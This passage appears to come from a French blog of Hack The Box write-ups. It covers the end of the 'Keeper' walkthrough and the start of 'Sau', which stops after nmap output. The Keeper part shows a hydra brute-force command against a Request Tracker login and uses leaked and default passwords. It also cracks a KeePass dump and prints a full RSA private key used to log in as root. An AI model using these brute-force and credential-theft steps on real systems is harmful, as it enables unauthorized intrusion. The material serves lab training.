class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">To raise an IT support ticket, please visit tickets.keeper.htb/rt/ </span></span></code></pre></td></tr></table> </div> </div><p>Pour pouvoir accéder à ce lien sur la machine cible, il faut relier l&rsquo;IP de la machine cible à ce nom de domaine dans le fichier <strong>/etc/hosts</strong>.</p> <h3 id="etchosts">/etc/hosts </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## On ajoute la ligne suivante</span> </span></span><span class="line"><span class="cl">10.10.11.227 keeper.htb tickets.keeper.htb </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="login-page--default-credentials">Login Page : default credentials </h3><p>En accédant au lien <strong><a class="link" href="http://tickets.keeper.htb/rt/" target="_blank" rel="noopener" >http://tickets.keeper.htb/rt/</a></strong> on tombe sur une page de connexion user/password. En testant quelques user/password par defaut on trouve : <strong>root/password</strong></p> <p>En cherchant sur internet les user/pass par defaut sur Request Tracker, on peut trouver la phrase suivante : <strong>The original (default) RT root user password is &ldquo;password&rdquo;</strong></p> <h3 id="hydra-bruteforce-login-page">Hydra: Bruteforce login page </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo hydra -l,-L &lt;Username/List&gt; -p,-P &lt;Password/List&gt; &lt;IP or domain name&gt; &lt;Method&gt; <span class="s2">&#34;&lt;Path&gt;:&lt;RequestBody&gt;:&lt;IncorrectVerbiage&gt;&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Dans notre cas</span> </span></span><span class="line"><span class="cl">sudo hydra -l root -P /usr/share/wordlists/rockyou.txt tickets.keeper.htb http-post-form <span class="s2">&#34;/rt/NoAuth/Login.html:user=^USER^&amp;pass=^PASS^&amp;next=b9a09132c611f3dce07e77d9fde8ffde:Your username or password is incorrect&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Résultat</span> </span></span><span class="line"><span class="cl">Hydra v9.4 <span class="o">(</span>c<span class="o">)</span> <span class="m">2022</span> by van Hauser/THC <span class="p">&amp;</span> David Maciejak - Please <span class="k">do</span> not use in military or secret service organizations, or <span class="k">for</span> illegal purposes <span class="o">(</span>this is non-binding, these *** ignore laws and ethics anyway<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Hydra <span class="o">(</span>https://github.com/vanhauser-thc/thc-hydra<span class="o">)</span> starting at 2023-12-28 19:08:49 </span></span><span class="line"><span class="cl"><span class="o">[</span>WARNING<span class="o">]</span> Restorefile <span class="o">(</span>ignored ...<span class="o">)</span> from a previous session found, to prevent overwriting, ./hydra.restore </span></span><span class="line"><span class="cl"><span class="o">[</span>DATA<span class="o">]</span> max <span class="m">16</span> tasks per <span class="m">1</span> server, overall <span class="m">16</span> tasks, <span class="m">14344399</span> login tries <span class="o">(</span>l:1/p:14344399<span class="o">)</span>, ~896525 tries per task </span></span><span class="line"><span class="cl"><span class="o">[</span>DATA<span class="o">]</span> attacking http-post-form://tickets.keeper.htb:80/rt/NoAuth/Login.html:user<span class="o">=</span>^USER^<span class="p">&amp;</span><span class="nv">pass</span><span class="o">=</span>^PASS^<span class="p">&amp;</span><span class="nv">next</span><span class="o">=</span>b9a09132c611f3dce07e77d9fde8ffde:Your username or password is incorrect </span></span><span class="line"><span class="cl"><span class="o">[</span>80<span class="o">][</span>http-post-form<span class="o">]</span> host: tickets.keeper.htb login: root password: password </span></span><span class="line"><span class="cl"><span class="m">1</span> of <span class="m">1</span> target successfully completed, <span class="m">1</span> valid password found </span></span><span class="line"><span class="cl">Hydra <span class="o">(</span>https://github.com/vanhauser-thc/thc-hydra<span class="o">)</span> finished at 2023-12-28 19:09:00 </span></span></code></pre></td></tr></table> </div> </div><p>On obtient bien <strong>root/password</strong> à l&rsquo;aide d&rsquo;hydra ! Avec un bruteforce de la méthode POST.</p> <h3 id="password-leak-for-user-lnorgaard">Password Leak for user lnorgaard </h3><p>En faisant quelques recherches sur la page d&rsquo;administration du site en tant que <strong>root</strong>, on a pu lister les utiliseurs ayant les droits d&rsquo;amdministrateurs. On trouve notamment un utilisateur qui aurait le pseudo : <strong>lnorgaard</strong></p> <p>En cliquant sur son pseudo, on accède à une page de profil. Sur cette page, on peut lire la description suivante:<br> <strong>New user. Initial password set to Welcome2023!</strong></p> <p>On a alors pu se connecter en SSH avec cet utilisateur et ce mot de passe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh lnorgaard@10.10.11.227 </span></span><span class="line"><span class="cl">lnorgaard@10.10.11.227<span class="err">&#39;</span>s password: Welcome2023! </span></span><span class="line"><span class="cl">Welcome to Ubuntu 22.04.3 LTS <span class="o">(</span>GNU/Linux 5.15.0-78-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> * Documentation: https://help.ubuntu.com </span></span><span class="line"><span class="cl"> * Management: https://landscape.canonical.com </span></span><span class="line"><span class="cl"> * Support: https://ubuntu.com/advantage </span></span><span class="line"><span class="cl">Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">You have mail. </span></span><span class="line"><span class="cl">Last login: Fri Dec <span class="m">29</span> 00:17:45 <span class="m">2023</span> from 10.10.16.58 </span></span><span class="line"><span class="cl">lnorgaard@keeper:~$ whoami </span></span><span class="line"><span class="cl">lnorgaard </span></span><span class="line"><span class="cl">lnorgaard@keeper:~$ ls </span></span><span class="line"><span class="cl">KeePassDumpFull.dmp passcodes.kdbx poc.py RT30000.zip user.txt </span></span><span class="line"><span class="cl">lnorgaard@keeper:~$ cat user.txt </span></span><span class="line"><span class="cl">41f1.....d10c </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege escalation </h2><h3 id="passcodeskdbx--ssh-to-root">passcodes.kdbx : SSH to root </h3><p>Un fichier avec un dump du mot de passe d&rsquo;une base de donnée keepass est disponible sur le compte de lnorgaard. On trouve une vulnérabilité sur internet pour cracker ce dump. A l&rsquo;aide d&rsquo;un fichier python qu&rsquo;on execute sur ce fichier on obtient le mot de passe de la bdd keepass contenu dans un fichier <strong>passcodes.kdbx</strong> :<br> <strong>rødgrød med fløde</strong></p> <p>En ouvrant, à l&rsquo;aide du logiciel keepass et de la clée, un mot de passe pour le ssh : root: <strong>F4&gt;&lt;3K0nd!</strong></p> <p>Il y a aussi un commentaire qui semble préciser une clée public et une clée privée. Important pour pouvoir se connecter en ssh à root. Le fichier semble avoir été généré par <strong>putty</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PuTTY-User-Key-File-3: ssh-rsa </span></span><span class="line"><span class="cl">Encryption: none </span></span><span class="line"><span class="cl">Comment: rsa-key-20230519 </span></span><span class="line"><span class="cl">Public-Lines: <span class="m">6</span> </span></span><span class="line"><span class="cl">AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D </span></span><span class="line"><span class="cl">8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T </span></span><span class="line"><span class="cl">EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM </span></span><span class="line"><span class="cl">Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu </span></span><span class="line"><span class="cl">FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ </span></span><span class="line"><span class="cl">LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et </span></span><span class="line"><span class="cl">Private-Lines: <span class="m">14</span> </span></span><span class="line"><span class="cl">AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j </span></span><span class="line"><span class="cl">oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih </span></span><span class="line"><span class="cl">kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY </span></span><span class="line"><span class="cl">f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT </span></span><span class="line"><span class="cl">VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz </span></span><span class="line"><span class="cl">UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs </span></span><span class="line"><span class="cl">OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz </span></span><span class="line"><span class="cl">in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r </span></span><span class="line"><span class="cl">SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV </span></span><span class="line"><span class="cl">09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa </span></span><span class="line"><span class="cl">xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA </span></span><span class="line"><span class="cl">AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD </span></span><span class="line"><span class="cl">AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy </span></span><span class="line"><span class="cl"><span class="nv">NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is</span><span class="o">=</span> </span></span><span class="line"><span class="cl">Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0 </span></span></code></pre></td></tr></table> </div> </div><p>En cherchant sur internet, on découvre qu&rsquo;on peut convertir les clées en format <strong>openssh</strong> pour pouvoir se connecter ensuite en <strong>ssh</strong> facilement. Voici la commande pour générer les clées :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## générer la clée public</span> </span></span><span class="line"><span class="cl">$ puttygen key.ppk -O public-openssh </span></span><span class="line"><span class="cl">ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81TEHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LMCj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1TuFVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQLxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et rsa-key-20230519 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## généré la clée privée</span> </span></span><span class="line"><span class="cl">$ puttygen key.ppk -O private-openssh </span></span><span class="line"><span class="cl">puttygen: need to specify an output file </span></span><span class="line"><span class="cl">$ puttygen key.ppk -O private-openssh -o rsa_id </span></span><span class="line"><span class="cl">$ cat rsa_id </span></span><span class="line"><span class="cl">----BEGIN RSA PRIVATE KEY----- </span></span><span class="line"><span class="cl">MIIEowIBAAKCAQEAp1arHv4TLMBgUULD7AvxMMsSb3PFqbpfw/K4gmVd9GW3xBdP </span></span><span class="line"><span class="cl">c9DzVJ+A4rHrCgeMdSrah9JfLz7UUYhM7AW5/pgqQSxwUPvNUxB03NwockWMZPPf </span></span><span class="line"><span class="cl">Tykkqig8VE2XhSeBQQF6iMaCXaSxyDL4e2ciTQMt+JX3BQvizAo/3OrUGtiGhX6n </span></span><span class="line"><span class="cl">FSftm50elK1FUQeLYZiXGtvSQKtqfQZHQxrIh/BfHmpyAQNU7hVW1Ldgnp0lDw1A </span></span><span class="line"><span class="cl">MO8CC+eqgtvMOqv6oZtixjsV7qevizo8RjTbQNsyd/D9RU32UC8RVU1lCk/LvI7p </span></span><span class="line"><span class="cl">5y5NJH5zOPmyfIOzFy6m67bIK+csBegnMbNBLQIDAQABAoIBAQCB0dgBvETt8/UF </span></span><span class="line"><span class="cl">NdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6joDni1wZdo7hTpJ5Zjdmz </span></span><span class="line"><span class="cl">wxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCihkmyZTZOV9eq1D6P1uB6A </span></span><span class="line"><span class="cl">XSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputYf7n24kvL0WlBQThsiLkK </span></span><span class="line"><span class="cl">cz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzTVkCew1DZuYnYOGQxHYW6 </span></span><span class="line"><span class="cl">WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivzUXjcCAviPpmSXB19UG8J </span></span><span class="line"><span class="cl">lTpgORyhAoGBAPaR+FID78BKtzThkhVqAKB7VCryJaw7Ebx6gIxbwOGFu8vpgoB8 </span></span><span class="line"><span class="cl">S+PfF5qFd7GVXBQ5wNc7tOLRBJXaxTDsTvVy+X8TEbOKfqrKndHjIBpXs+Iy0tOA </span></span><span class="line"><span class="cl">GSqzgADetwlmklvTUBkHxMEr3VAhkY6zCLf+5ishnWtKwY3UVsr+Z4f1AoGBAK28 </span></span><span class="line"><span class="cl">/Glmp7Kj7RPumHvDatxtkdT2Iaecl6cYhPPS/OzSFdPcoEOwHnPgtuEzspIsMj2j </span></span><span class="line"><span class="cl">gZZjHvjcmsbLP4HO6PU5xzTxSeYkcol2oE+BNlhBGsR4b9Tw3UqxPLQfVfKMdZMQ </span></span><span class="line"><span class="cl">a8QL2CGYHHh0Ra8D6xfNtz3jViwtgTcBCHdBu+lZAoGAcj4NvQpf4kt7+T9ubQeR </span></span><span class="line"><span class="cl">RMn/pGpPdC5mOFrWBrJYeuV4rrEBq0Br9SefixO98oTOhfyAUfkzBUhtBHW5mcJT </span></span><span class="line"><span class="cl">jzv3R55xPCu2JrH8T4wZirsJ+IstzZrzjipe64hFbFCfDXaqDP7hddM6Fm+HPoPL </span></span><span class="line"><span class="cl">TV0IDgHkKxsW9PzmPeWD2KUCgYAt2VTHP/b7drUm8G0/JAf8WdIFYFrrT7DZwOe9 </span></span><span class="line"><span class="cl">LK3glWR7P5rvofe3XtMERU9XseAkUhTtqgTPafBSi+qbiA4EQRYoC5ET8gRj8HFH </span></span><span class="line"><span class="cl">6fJ8gdndhWcFy/aqMnGxmx9kXdrdT5UQ7ItB+lFxHEYTdLZC1uAHrgncqLmT2Wrx </span></span><span class="line"><span class="cl">heBgKQKBgFViaJLLoCTqL7QNuwWpnezUT7yGuHbDGkHl3JFYdff0xfKGTA7iaIhs </span></span><span class="line"><span class="cl">qun2gwBfWeznoZaNULe6Khq/HFS2zk/Gi6qm3GsfZ0ihOu5+yOc636Bspy82JHd3 </span></span><span class="line"><span class="cl">BE5xsjTZIzI66HH5sX5L7ie7JhBTIO2csFuwgVihqM4M+u7Ss/SL </span></span><span class="line"><span class="cl">-----END RSA PRIVATE KEY----- </span></span></code></pre></td></tr></table> </div> </div><p>J&rsquo;ai pu ensuite l&rsquo;envoyer sur la <strong>kali</strong> puis sur la <strong>machine cible</strong> (pas forcement necessaire) à l&rsquo;aide de <strong>scp</strong>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## J&#39;ai copié à la main vers la VM en ouvrant avec vim un fichier</span> </span></span><span class="line"><span class="cl">lnorgaard@keeper:~$ vim rsa_id </span></span><span class="line"><span class="cl"><span class="c1">## Tentative de connexion ssh vers root</span> </span></span><span class="line"><span class="cl">lnorgaard@keeper:~$ ssh root@keeper.htb -i rsa_id </span></span><span class="line"><span class="cl">@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ </span></span><span class="line"><span class="cl">@ WARNING: UNPROTECTED PRIVATE KEY FILE! @ </span></span><span class="line"><span class="cl">@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ </span></span><span class="line"><span class="cl">Permissions <span class="m">0664</span> <span class="k">for</span> <span class="s1">&#39;rsa_id&#39;</span> are too open. </span></span><span class="line"><span class="cl">It is required that your private key files are NOT accessible by others. </span></span><span class="line"><span class="cl">This private key will be ignored. </span></span><span class="line"><span class="cl">Load key <span class="s2">&#34;rsa_id&#34;</span>: bad permissions </span></span><span class="line"><span class="cl">root@keeper.htb<span class="err">&#39;</span>s password: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">lnorgaard@keeper:~$ chmod <span class="m">600</span> rsa_id </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Tentative de connexion ssh vers root</span> </span></span><span class="line"><span class="cl">lnorgaard@keeper:~$ ssh root@keeper.htb -i rsa_id </span></span><span class="line"><span class="cl">Welcome to Ubuntu 22.04.3 LTS <span class="o">(</span>GNU/Linux 5.15.0-78-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> * Documentation: https://help.ubuntu.com </span></span><span class="line"><span class="cl"> * Management: https://landscape.canonical.com </span></span><span class="line"><span class="cl"> * Support: https://ubuntu.com/advantage </span></span><span class="line"><span class="cl">Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">You have new mail. </span></span><span class="line"><span class="cl">Last login: Fri Dec <span class="m">29</span> 00:08:39 <span class="m">2023</span> from 10.10.14.156 </span></span><span class="line"><span class="cl">root@keeper:~# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@keeper:~# ls </span></span><span class="line"><span class="cl">root.txt RT30000.zip SQL </span></span><span class="line"><span class="cl">root@keeper:~# cat root.txt </span></span><span class="line"><span class="cl">be35.....f853 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/sau-htb/Thu, 28 Dec 2023 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/sau-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Sau cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Sau</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.224</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ sudo nmap -sV -sC 10.10.11.224 -A -n </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3072</span> aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ <span class="m">256</span> b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl">80/tcp filtered http </span></span><span class="line"><span class="cl">55555/tcp open unknown </span></span><span class="line"><span class="cl"><span class="p">|</span> fingerprint-strings: </span></span><span class="line"><span class="cl"><span class="p">|</span> FourOhFourRequest: </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTP/1.0 <span class="m">400</span> Bad Request </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Type: text/plain<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8 </span></span><span class="line"><span class="cl"><span class="p">|</span> X-Content-Type-Options: nosniff </span></span><span class="line"><span class="cl"><span class="p">|</span> Date: Wed, <span class="m">27</span> Dec <span class="m">2023</span> 23:03:42 GMT </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Length: <span class="m">75</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> invalid basket name<span class="p">;</span> the name does not match pattern: ^<span class="o">[</span>wd-_<span class="se">\.</span><span class="o">]{</span>1,250<span class="o">}</span>$ </span></span><span class="line"><span class="cl"><span class="p">|</span> GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTP/1.1 <span class="m">400</span> Bad Request </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Type: text/plain<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8 </span></span><span class="line"><span class="cl"><span class="p">|</span> Connection: close </span></span><span class="line"><span class="cl"><span class="p">|</span> Request </span></span><span class="line"><span class="cl"><span class="p">|</span> GetRequest: </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTP/1.0 <span class="m">302</span> Found </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8 </span></span><span class="line"><span class="cl"><span class="p">|</span> Location: /web </span></span><span class="line"><span class="cl"><span class="p">|</span> Date: Wed, <span class="m">27</span> Dec <span class="m">2023</span> 23:03:16 GMT </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Length: <span class="m">27</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">href</span><span class="o">=</span><span class="s2">&#34;/web&#34;</span>&gt;Found&lt;/a&gt;. </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTPOptions: </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTP/1.0 <span class="m">200</span> OK </span></span><span class="line"><span class="cl"><span class="p">|</span> Allow: GET, OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span> Date: Wed, <span class="m">27</span> Dec <span class="m">2023</span> 23:03:16 GMT </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Content-Length: <span class="m">0</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="exploitation-request-baskets">Exploitation request-baskets </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">I found a CVE online and I exploit it </span></span></code></pre></td></tr></table> </div> </div><h3 